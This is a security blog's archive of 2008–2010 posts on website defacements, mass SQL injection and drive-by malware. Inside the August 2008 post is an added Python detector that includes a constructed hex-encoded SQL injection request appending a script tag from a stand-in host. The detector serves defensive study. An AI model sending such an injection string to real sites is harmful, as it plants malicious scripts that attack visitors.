
Security Blog

Google to Flag Potentially Compromised Sites More Aggressively

Posted by Luke Murphey on Dec 22nd 2010, 02:26 a.m. CST

Google is changing the methods it uses to flag sites as suspicious or dangerous. The changes will flag sites that are not necessarily malicious but may not be under the control of the owner (such as sites with spam or links from phishers).

Maxim Weinstein of Stopbadware.com told SC Magazine that:

Instead of say just lowering the site in the search rankings a bit, we're actually going to flag it in a more aggressive, public way.

Source: krebsonsecurity.com

Adobe PDF the Most Attacked Application

Posted by Luke Murphey on Apr 12th 2010, 03:40 p.m. CDT

PDF has become the most attacked application according to F-Secure: 61% of the targeted attacks F-Secure tracked in 2010 used an Adobe PDF exploit, while 39% targeted Word, Excel or PowerPoint.

[techworld.com]

Gumblar website compromises increase 188% within a week

Posted by Luke Murphey on May 20th 2009, 01:44 a.m. CDT

Thousands of websites have been compromised by a worm that defaces websites and installs malicious code that attacks website visitors. The worm has been on a rampage and reportedly infected 188% more sites within a week. Gumblar has compromised a number of high profile websites including Tennis.com, Variety.com and Coldwellbanker.com.

If you want more details, Unmaskedparasites.com has a detailed technical writeup of Gumblar.

[SC Magazine]

Is Security a Myth?

Posted by Luke Murphey on Apr 06th 2009, 07:49 p.m. CDT

Baseline recently ran an article containing a list of discouraging statistics. No surprise, malicious web-based threats are on the list:

The number of new malicious Web sites in the fourth quarter of 2008 surpassed by 50 percent the total number of these sites in 2007, said the 2008 IBM X-Force Annual Trend and Risk Report.

[Baseline]

Microsoft Ireland Defaced

Posted by Luke Murphey on Dec 30th 2008, 04:16 p.m. CST

Microsoft Ireland was defaced by "Terrorist Crew." Hackers successfully compromised the microsoft.ie domain which redirects users to Microsoft.com/Ireland. The page that performs the redirection wasn't hosted by Microsoft but rather by a third party.

Most large websites are partially hosted by third parties; this makes monitoring extremely difficult for most existing security technologies (such as IDSes and firewalls) since they need to be installed in front of the web servers. Installation therefore gets expensive: another device must be purchased and the third party must agree to install it in front of the website. Few companies are willing to pay for this and most hosting providers wouldn't allow it anyway.

What will go wrong in 2009

Posted by Luke Murphey on Dec 30th 2008, 04:01 p.m. CST

Bob Sullivan at MSNBC posted a blog entry listing the things that will go wrong in technology in 2009; he specifically names malicious website defacements as one of them and cites the recent MyCheckFree.com defacement as an example. Below are excerpts:

"If you're wondering what computer headaches you should expect in 2009, the Checkfree attack should be high on your list, says Amit Klein, a domain name system expert at The Trusteer Security Research Group. He compared the attack to a phishing attack on steroids, and said it will probably keep security professionals up late at night. None of their fancy security tools can ward off complete interception of traffic headed to a Web site."

"There are new reasons not to trust the Web sites you visit. Getting a virus by clicking on an infected attachment is now passé; if your computer gets sick next year, it will probably be because you visited a booby-trapped Web site."

Credit: MSNBC

Thousands of Legitimate Websites Hosting New IE Flaw

Posted by Luke Murphey on Dec 19th 2008, 06:29 a.m. CST

The recently announced Internet Explorer flaw is being used to conduct drive-by attacks against website visitors. Trend Micro notes that thousands of websites are hosting the exploit after being compromised by attackers. The Microsoft Malware Protection Center notes:

"some legitimate web sites were maliciously modified to include the exploits. For example a popular search engine in Taiwan was found to be hosting the exploit. Luckily, that site was quickly cleaned. Secondly, we’ve noticed some pornography sites have started hosting these exploits too: We recently found a web site in Hong Kong that serves various content including adult entertainment."

"Based on our stats, since the vulnerability has gone public, roughly 0.2% of users worldwide may have been exposed to websites containing exploits of this latest vulnerability."

0.2% is a staggering number given how many people use the Internet and how recently the exploit surfaced. This points out precisely the reason hackers choose to deface websites maliciously; few other methods can distribute an exploit that quickly and effectively.

Embassy of Brazil Compromised (in India)

Posted by Luke Murphey on Nov 23rd 2008, 04:33 a.m. CST

The website for the embassy of Brazil in India has been compromised and contains links to fake anti-virus software. This isn't the first time an embassy was compromised, consider the following embassy compromises:

1448 Adult Domains Compromised

Posted by Luke Murphey on Nov 23rd 2008, 04:23 a.m. CST

1448 adult domains were compromised by attackers. The domains were taken over after the administrator managing them did so from a computer that was itself already compromised.

As of yet, the websites don't appear to be hosting malware or other undesirables. However, Dancho Danchev believes that might change.

Barack Obama Community Blog Malware

Posted by Luke Murphey on Nov 12th 2008, 07:03 p.m. CST

The website for the Barack Obama campaign is being used to direct users to sites containing malware according to a ZDNet report. Attackers uploaded a GIF to the community blog section of the website that links to the servers hosting the malware. Users who search Google for "obama trojan anti-virus" are led to the page with the GIF. Upon clicking, the user is sent to the malicious server.

Adobe Website "seriousmagic.com" Defaced

Posted by Luke Murphey on Oct 30th 2008, 05:06 a.m. CDT

The Asprox worm is still making its rounds. It successfully defaced seriousmagic.com, an Adobe-owned website. Sophos says that the site was "riddled with infections".

Adobe didn't respond very quickly and eventually just redirected site visitors to adobe.com while they performed the cleanup. The site appears to be clean now.

Note that NSIA has had definitions for Asprox for a while (with the Compromise.Defacement.Mass_SQL_Injection definition).

PDF Exploit Packs

Posted by Luke Murphey on Sep 27th 2008, 08:34 p.m. CDT

Researchers have discovered PDF exploit packs, much like the web exploit packs such as IcePack. This means that PDF exploits are likely to increase. The biggest target will probably continue to be email users who aren't used to treating PDFs as dangerous. However, websites are at risk too since many sites allow PDFs to be uploaded by users.

Bill O'Reilly's Website Defaced

Posted by Luke Murphey on Sep 27th 2008, 08:18 p.m. CDT

The website of conservative commentator Bill O'Reilly has been defaced. The attackers also leaked login names and passwords that were not adequately protected.

ZDNet has a detailed overview of the attack and provides background information on the groups involved.

Large Hadron Collider Website Defaced

Posted by Luke Murphey on Sep 13th 2008, 06:23 a.m. CDT

Hackers defaced a web portal for the CERN Large Hadron Collider according to a SecurityFocus article. The hackers reportedly did nothing more than just deface the site which is fairly benign compared to what many attackers are doing.

The Large Hadron Collider went live on September 9th and captured much media attention. The amount of attention likely drew the attackers to the site.

Olympic News Sites Compromised

Posted by Luke Murphey on Sep 13th 2008, 06:18 a.m. CDT

A number of Olympic news sites have been compromised and are being used as malware distribution points. Attackers appear to have exploited a SQL injection vulnerability in order to modify pages; their modifications try to force website visitors into downloading malicious code and joining a botnet.

Tom Clare of BlueCoat noted that "Any popular news source is going to be targeted for an attack because of the volume of traffic." This is further evidence that attackers are targeting high profile websites in order to deploy malware. This trend is likely to continue since website security is unlikely to improve substantially anytime soon.

Mass Defacements Related to Botnets?

Posted by Luke Murphey on Sep 01st 2008, 05:12 p.m. CDT

The number of machines controlled by botnets has grown by a factor of 4 in the last few months. Internet Storm Center Handler John Bambenek suggests that the increase may be due to the mass defacement attacks against websites that started around June of this year.

Michael Phelps Website Defaced

Posted by Luke Murphey on Aug 24th 2008, 05:31 a.m. CDT

The website of Olympian Michael Phelps was defaced. A screenshot of the defacement is available on the Internet.

An SC Magazine article covering the defacement (http://www.scmagazineus.com/Olympic-champion-Phelps-website-defaced-in-Turkish-hack/article/115773/) indicates that the attackers likely found a vulnerability that "enabled them access to the underlying directory, or through some attack means such as cross-site scripting." However, cross-site scripting is highly unlikely to have been the cause, and so is "access to the underlying directory", which implies that the attackers gained access to the file system. Most likely, a SQL injection vulnerability is at fault and the malicious content was stored in the database (as opposed to on the file system directly). The "Ask Michael" portion of the site was removed following the attack, so it is logical to conclude that this was the vector the attackers used, since that portion of the site would have performed SQL queries on user-supplied input.

Note that NSIA currently detects these types of defacements with the Compromise.HackerSignature definitions.

Flash Clipboard Attacks

Posted by Luke Murphey on Aug 24th 2008, 05:13 a.m. CDT

Attackers have found a way to hijack the clipboard using Flash. The attack repeatedly overwrites the clipboard so that whatever the user pastes is a malicious URL. The attackers hope that users will either click the links or send the malicious links in emails. Security researcher Aviv Raff has posted a harmless demo of the attack (note that your anti-virus client may block the Flash file).

The attackers get others' websites to host the malicious code for them by submitting malicious Flash ads to advertising companies.

Almost all platform and browser combinations are affected since Flash is widely supported. Users of Linux and Mac OS X are reporting that they are indeed affected.

Update [Sep 27th 2008, 08:06 p.m. CDT]:

Adobe has announced that it plans on requiring user approval before accessing the clipboard in a future version of Flash. This will likely work similarly to the way Flash asks the user whether or not it can access the web-cam or microphone:

Flash camera access request form

Update [Oct 30th 2008, 05:09 a.m. CDT]:

Adobe has released an update to Flash that is intended to address the clipboard vulnerability as well as the click-jacking vulnerability.

Newsweek.com Posting Malicious Ads

Posted by Luke Murphey on Aug 24th 2008, 04:51 a.m. CDT

Newsweek.com was reportedly posting malicious advertisements. The advertisements try to trick users into purchasing anti-virus software by indicating that the user's PC is overrun with viruses.

SC Magazine noted that the attackers used Fuse in an attempt to evade detection. However, one must note there is nothing wrong with Fuse and it is not a malicious tool. It is simply a library for creating animations. The validation techniques used by the advertisers are more at fault than the Fuse developers.

New Mass Defacement Attack

Posted by Luke Murphey on Aug 09th 2008, 04:10 a.m. CDT

Another mass defacement is underway. This particular defacement leaves behind malicious scripts that attack website users. As of August 8th, about 4,000 sites have been impacted. The attacks are underway so additional sites will likely be impacted.

NSIA currently detects this using the cross-domain scripting definition.

Update []:

The number of pages compromised by this attack continues to increase according to the Internet Storm Center. Currently, about 33,000 pages have been impacted. Though this is a lot of pages, it is significantly less than other similar attacks. You can view the impacted sites via Google. Obviously, do not view the web pages unless you want to get infected.

Update [Aug 25th 2008, 03:25 a.m. CDT]:

A new definition was created (Compromise.Defacement.MassSQLInjection) that will detect this specific SQL injection. Note that this new definition will usually trigger along with the cross domain scripting definition (Baseline.Property.CrossDomainScripting) whenever the attack successfully creates a script tag. However, this new definition will also detect failed attacks (those that do not successfully create a script tag).
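The two checks described in this update and in the Phelps post above (a script tag injected through stored SQL injection, and the injection request itself, which should be caught even when it fails to create a script tag) can be reproduced in a few lines. The following is an added example written for this page, not NSIA's own definitions; the page HTML, the host names and the request string are constructed here, and the DECLARE/SET/CAST(0x...)/EXEC shape it matches is the hex-encoded form the 2008 mass SQL injection attacks used.

```python
"""Added example: a cross-domain <script src> check over a page and a decoder
for hex-encoded mass SQL injection requests.  Not NSIA code; all inputs below
are constructed for the example."""
import re
from html.parser import HTMLParser
from urllib.parse import unquote_plus, urlparse


class _ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> tag in a document."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name == "src" and value:
                    self.srcs.append(value)


def cross_domain_scripts(html_text, page_url):
    """Return script src values whose host differs from the page's own host.

    A defacement that appends <script src="http://attacker/x.js"> to stored
    content shows up here; same-host and relative script URLs do not.
    """
    page_host = (urlparse(page_url).hostname or "").lower()
    collector = _ScriptSrcCollector()
    collector.feed(html_text)
    foreign = []
    for src in collector.srcs:
        host = urlparse(src).hostname
        # A relative URL has no host and is served by the page's own site.
        if host is not None and host.lower() != page_host:
            foreign.append(src)
    return foreign


# Request shape of the 2008 mass SQL injection wave: the real statement is hidden
# as hex inside CAST(0x... AS [N]VARCHAR(n)) and run through EXEC().
_MASS_SQLI = re.compile(
    r"DECLARE\s+@\w+\s+N?VARCHAR\(\d+\)\s*;\s*SET\s+@\w+\s*=\s*"
    r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?)VARCHAR\(\d+\)\s*\)\s*;\s*EXEC\(",
    re.IGNORECASE,
)


def decode_mass_sqli(query_string):
    """Return the SQL hidden in the hex CAST, or None if the request does not
    carry the pattern.  Matching keys on the request, not on the page, so an
    attempt that never manages to create a script tag is still reported."""
    m = _MASS_SQLI.search(unquote_plus(query_string))
    if not m:
        return None
    raw = bytes.fromhex(m.group(1))
    # NVARCHAR payloads are UTF-16LE; VARCHAR payloads are single-byte text.
    encoding = "utf-16-le" if m.group(2).upper() == "N" else "latin-1"
    return raw.decode(encoding, errors="replace")


# Constructed sample inputs (not real captured traffic or a real site).
SAMPLE_PAGE_URL = "http://www.example.com/ask.asp?id=7"
SAMPLE_HTML = """<html><head>
<script src="/js/site.js"></script>
<script src="http://www.example.com/js/menu.js"></script>
</head><body><p>Answer text</p>
<script src="http://bad.example.net/ngg.js"></script>
</body></html>"""

# Statement the attacker wants run against every text column of the site.
HIDDEN_SQL = ("UPDATE answers SET body = body + "
              "'<script src=\"http://bad.example.net/ngg.js\"></script>'")
SAMPLE_REQUEST = (
    "id=7;DECLARE @S VARCHAR(4000);SET @S=CAST(0x"
    + HIDDEN_SQL.encode("ascii").hex().upper()
    + " AS VARCHAR(4000));EXEC(@S);--"
)

if __name__ == "__main__":
    print("foreign scripts:", cross_domain_scripts(SAMPLE_HTML, SAMPLE_PAGE_URL))
    print("decoded request:", decode_mass_sqli(SAMPLE_REQUEST))
```

The page check only fires once the injection has succeeded and the stored content is rendered, which is why the request check is the one that also catches failed attempts; in practice the request pattern belongs in web server or IDS logs, while the page check runs against what a visitor actually receives.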

ASPROX Defacements Abound

Posted by Luke Murphey on Aug 09th 2008, 04:10 a.m. CDT

The Internet Storm Center noted that many sites that were compromised by the ASPROX worm have not been cleaned up. Reportedly, about 1.5 million sites are still infected. Oftentimes defaced websites are not restored for a long time for any of the following reasons:

  • The site was cleaned but the vulnerability was not, so the website was simply re-infected as soon as it was fixed. This is more common than one might think. Many times the website owners don't know how to identify or fix the vulnerability. In big businesses, the changes may be held up in change control or other red tape.
  • The website owner no longer actively uses or maintains the site and doesn't know that it is compromised.
  • The compromised pages are in places that site owners didn't know existed (such as rogue web servers or deprecated pages).

Note that ASPROX-defaced pages are currently detected by the cross-domain scripting definition.

Update [Aug 25th 2008, 02:57 a.m. CDT]:

The ASPROX infections appear to be dropping now. SANS reports that the number of infections has been reduced to about 175,000.